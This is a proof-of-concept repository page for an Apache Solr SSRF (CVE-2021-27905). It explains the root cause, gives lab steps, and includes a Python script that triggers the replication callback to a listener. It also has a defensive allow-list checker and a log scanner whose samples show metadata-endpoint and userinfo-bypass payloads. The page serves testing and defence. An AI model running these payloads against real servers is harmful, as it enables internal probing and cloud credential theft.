POC details: 08c95919af11685447b1898b544213de71ac15d0

Related vulnerability
Title: Apache Solr code issue vulnerability (CVE-2021-27905)
Description: Apache Solr is a search server from the Apache Software Foundation built on Lucene (a full-text search engine). It supports faceted search, vertical search, highlighting of search results, and more. Apache Solr versions prior to 8.8.2 contain a code issue vulnerability: an attacker can abuse the masterUrl parameter to have index data replicated into the local core from a URL of their choosing.
Description
Apache Solr < 8.8.2 Server Side Request Forgery
Introduction
# CVE-2021-27905

| **Sr No** | **Title**                                     |
| --------- | --------------------------------------------- |
| 1         | [Overview](#overview)                         |
| 2         | [Root Cause](#root-cause)                     |
| 3         | [Proof Of Concept](#proof-of-concept)         |
| 4         | [Mitigation (8.8.2+)](#mitigation-882)        |
| 5         | [Reference](#reference)                       |

**For educational and research purposes only. Do not use this code on systems you do not own or have explicit permission to test. I am not responsible for any misuse.**

## Overview

This is a Server Side Request Forgery vulnerability in **Apache Solr** (< 8.8.2). Through the replication handler's `masterUrl` parameter, an unauthenticated remote attacker (Solr ships with no authentication enabled) can make the Solr server issue HTTP requests to hosts of the attacker's choosing: internal services, cloud metadata endpoints, or an attacker-controlled listener.

**Affected Versions** : All versions prior to `8.8.2` (`7.0.0 - 7.7.3, 8.0.0 - 8.8.1`)

## Root Cause

The replication mechanism in **Solr** lets a replica fetch index files from a master/leader whose address is given in the `masterUrl` parameter (alias `leaderUrl`) of the `/replication` handler. In the affected versions the handler did not validate that URL against any allow-list, even though Solr already applied such a check to the `shards` parameter. Anyone who can reach the handler can therefore make the server open a connection to a URL they choose.

**Vulnerable Flow**
- An attacker would send a request to an endpoint such as:

```
/solr/<CORE_NAME>/replication?command=fetchindex&masterUrl=http://<ATTACKER_DOMAIN>
```

**Solr**'s `ReplicationHandler` would:
1. Accept the request without authentication and without checking the `masterUrl` host against an allow-list.
2. Start an `IndexFetcher` for the supplied URL; `fetchindex` returns immediately with "OK" because the fetch runs in a background thread.
3. Make HTTP requests from the Solr host to that address. The remote response is never reflected back to the caller, so this is a blind SSRF: confirm it out-of-band with a listener you control, or observe the failure in Solr's logs.
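Because the fetch runs in the background and nothing from the remote side is echoed, confirming this issue means standing up a listener the Solr host can reach and watching for the callback. The script below is an added example written for this page; it is not the repository's `cve-2021-27905.py`. It assumes the Solr base URL has the form `http://host:8983` (the README's lab uses `127.0.0.1:8983`) and that the fetcher's first callback is a `command=indexversion` request to `<masterUrl>/replication`, which is an assumption about Solr's `IndexFetcher`, not something the README states.

```python
"""Out-of-band confirmation of the CVE-2021-27905 replication SSRF.
Added example for this page; not the repository's cve-2021-27905.py."""
import argparse
import threading
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer


def build_probe_url(target, core, callback_url):
    """Build the fetchindex request shown in the README. `target` is the Solr
    base URL (e.g. http://127.0.0.1:8983); `callback_url` becomes masterUrl."""
    params = urllib.parse.urlencode(
        {"command": "fetchindex", "masterUrl": callback_url, "wt": "json"})
    return f"{target.rstrip('/')}/solr/{core}/replication?{params}"


def send_probe(url, timeout=10):
    """GET `url`. fetchindex answers at once (the fetch runs in a background
    thread), so the remote response is never reflected in what we get back."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.status, resp.read().decode("utf-8", "replace")


class CallbackListener:
    """Minimal HTTP listener recording whatever Solr requests from masterUrl.
    Assumption: the first call is <masterUrl>/replication?command=indexversion."""

    def __init__(self, bind="0.0.0.0", port=0):
        self.hits = []
        self._seen = threading.Event()
        self._server = ThreadingHTTPServer((bind, port), self._handler())
        self.port = self._server.server_address[1]  # real port when port=0
        self._thread = threading.Thread(
            target=self._server.serve_forever, daemon=True)

    def _handler(self):
        listener = self

        class Handler(BaseHTTPRequestHandler):
            def do_GET(self):
                listener.hits.append({
                    "client": self.client_address[0],
                    "path": self.path,
                    "user_agent": self.headers.get("User-Agent", ""),
                })
                listener._seen.set()
                self.send_response(200)
                self.send_header("Content-Length", "0")
                self.end_headers()

            do_POST = do_GET

            def log_message(self, *args):  # keep stdout for our own output
                pass

        return Handler

    def start(self):
        self._thread.start()
        return self

    def stop(self):
        self._server.shutdown()
        self._server.server_close()

    def wait_for_callback(self, timeout):
        """Block up to `timeout` seconds; return recorded requests (may be empty)."""
        self._seen.wait(timeout)
        return list(self.hits)


if __name__ == "__main__":
    ap = argparse.ArgumentParser(description="Confirm CVE-2021-27905 via callback")
    ap.add_argument("--target", required=True, help="Solr base URL, e.g. http://127.0.0.1:8983")
    ap.add_argument("--core", required=True, help="core name, e.g. demo")
    ap.add_argument("--callback-host", required=True, help="IP/host the Solr server can reach you on")
    ap.add_argument("--port", type=int, default=9000, help="listener port (constructed default)")
    args = ap.parse_args()

    listener = CallbackListener(port=args.port).start()
    probe = build_probe_url(args.target, args.core,
                            f"http://{args.callback_host}:{listener.port}")
    status, body = send_probe(probe)
    print(f"[*] fetchindex -> HTTP {status}: {body.strip()[:80]}")
    hits = listener.wait_for_callback(timeout=15)
    listener.stop()
    if hits:
        print(f"[+] VULNERABLE: {hits[0]['client']} requested {hits[0]['path']}")
    else:
        print("[-] no callback within 15s: patched, allow-listed, or egress blocked")
```

A missing callback is not proof of a patched host: an egress filter between Solr and your listener produces the same silence, so check `solr.log` on the target for the fetcher's connection error when you have access.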

## Proof Of Concept

**LAB SETUP**
- A lab can be set up locally using docker:

```shell
$ cd lab
$ docker compose up -d

# verify accessibility
$ curl http://127.0.0.1:8983/solr
```

- Cleanup

```shell
$ docker compose down
```

**EXPLOITATION**
- Setup a virtual environment:

```shell
# for windows
$ python -m venv <NAME>
$ .\<NAME>\Scripts\activate
# for linux (the activate script lives under bin/, not scripts/)
$ python3 -m venv <NAME>
$ source ./<NAME>/bin/activate
```

- Install requirements:

```shell
$ pip install -r requirements.txt
```

- Run `cve-2021-27905.py`, where `<SSRF_PAYLOAD>` is the URL the target should be made to request (for example a listener you control):

```shell
$ python3 cve-2021-27905.py --target <TARGET> --payload <SSRF_PAYLOAD>
```

![SSRF PoC](attachments/poc.gif)

## Mitigation (8.8.2+)

Solr 8.8.2 changed `ReplicationHandler` to:
- Check `masterUrl`/`leaderUrl` against the same allow-list Solr already applied to the `shards` parameter: the `shardsWhitelist` configured in `solr.xml` (system property `solr.shardsWhitelist`) or, in SolrCloud mode, the live nodes of the cluster. A URL whose host:port is not on the list is rejected before any connection is made.

Operational recommendations:
- Upgrade to 8.8.2 or later.
- Do not expose Solr, and `/replication` in particular, to untrusted clients; put authentication/authorization and network controls in front of it.
- If replication is not used, remove the handler from `solrconfig.xml`.
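The allow-list check described above, and a retroactive hunt through `solr.log` for `fetchindex` requests whose leader was not on the list, as an added example for this page. This is not Solr's own code and not the repository's script; the allow-list, the log lines and the port defaulting are constructed for illustration.

```python
"""Leader allow-list check of the kind Solr 8.8.2 added, plus a hunt over
Solr request-log lines. Added example; not Solr's code, not the PoC script."""
import re
import urllib.parse

# Constructed allow-list (assumption): the leaders this replica may pull from,
# in the host:port form used by shardsWhitelist in solr.xml.
ALLOWED_LEADERS = {"solr-leader.internal:8983", "10.0.0.10:8983"}


def normalize_leader_url(url):
    """Reduce a masterUrl/leaderUrl to host:port for comparison. A trailing
    /replication is stripped because ReplicationHandler tolerates it; filling a
    missing port from the scheme is this example's choice, not Solr's."""
    url = url.strip()
    if url.endswith("/replication"):
        url = url[: -len("/replication")]
    parts = urllib.parse.urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        raise ValueError(f"unsupported or hostless URL: {url!r}")
    port = parts.port or (443 if parts.scheme == "https" else 80)
    # .hostname is lower-cased and excludes any user@ prefix, so
    # http://solr-leader.internal:8983@10.0.0.99:9000/ resolves to 10.0.0.99:9000
    return f"{parts.hostname}:{port}"


def leader_url_allowed(url, allowed=ALLOWED_LEADERS):
    """Hardened check: parse the URL, then compare host:port to the allow-list."""
    try:
        return normalize_leader_url(url) in allowed
    except ValueError:
        return False


def naive_leader_check(url, allowed=ALLOWED_LEADERS):
    """The tempting but wrong check: substring match. It accepts a URL that
    merely mentions an allowed host in its userinfo part."""
    return any(entry in url for entry in allowed)


# Solr logs each request as "path=/replication params={...}"; pull out the params.
REQUEST_RE = re.compile(r"path=/replication params=\{(?P<params>[^}]*)\}")


def scan_solr_log(lines, allowed=ALLOWED_LEADERS):
    """Return (line_no, param, url) for every fetchindex whose leader is not on
    the allow-list. Useful for hosts that were exposed before they were patched."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        params = urllib.parse.parse_qs(m.group("params"))
        if "fetchindex" not in params.get("command", []):
            continue
        for key in ("masterUrl", "leaderUrl"):
            for url in params.get(key, []):
                if not leader_url_allowed(url, allowed):
                    findings.append((n, key, url))
    return findings


# Constructed solr.log excerpt (not captured from a real system) in the
# o.a.s.c.S.Request format. Lines 3 and 5 are the ones a defender should see.
SAMPLE_LOG = [
    "2021-04-12 10:15:01.001 INFO  (qtp1-14) [   x:demo] o.a.s.c.S.Request [demo]  webapp=/solr path=/select params={q=*:*&wt=json} hits=3 status=0 QTime=2",
    "2021-04-12 10:15:07.418 INFO  (qtp1-17) [   x:demo] o.a.s.c.S.Request [demo]  webapp=/solr path=/replication params={command=fetchindex&masterUrl=http://solr-leader.internal:8983/solr/demo} status=0 QTime=1",
    "2021-04-12 10:16:22.090 INFO  (qtp1-19) [   x:demo] o.a.s.c.S.Request [demo]  webapp=/solr path=/replication params={command=fetchindex&masterUrl=http://169.254.169.254/latest/meta-data/&wt=json} status=0 QTime=0",
    "2021-04-12 10:16:40.512 INFO  (qtp1-21) [   x:demo] o.a.s.c.S.Request [demo]  webapp=/solr path=/replication params={command=details&wt=json} status=0 QTime=1",
    "2021-04-12 10:17:03.777 INFO  (qtp1-23) [   x:demo] o.a.s.c.S.Request [demo]  webapp=/solr path=/replication params={command=fetchindex&leaderUrl=http://solr-leader.internal:8983@10.0.0.99:9000/} status=0 QTime=1",
]

if __name__ == "__main__":
    for line_no, key, url in scan_solr_log(SAMPLE_LOG):
        print(f"line {line_no}: {key}={url} is not an allowed leader")
```

The userinfo case on the last sample line is why the comparison must be made on the parsed host:port rather than on the raw string: the attacker's URL contains the allowed leader verbatim, yet the connection goes to 10.0.0.99.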

## Reference

- https://nvd.nist.gov/vuln/detail/CVE-2021-27905
- https://lists.apache.org/thread/90kct018gfdnvh9wh5xvt0grm9jk2l80

---
File snapshot

```
/data/pocs/08c95919af11685447b1898b544213de71ac15d0
├── attachments
│   └── poc.gif             (4.3M)
├── cve-2021-27905.py       (1.8K)
├── lab
│   └── docker-compose.yml  (227)
├── README.md               (2.8K)
└── requirements.txt        (8)

3 directories, 5 files
```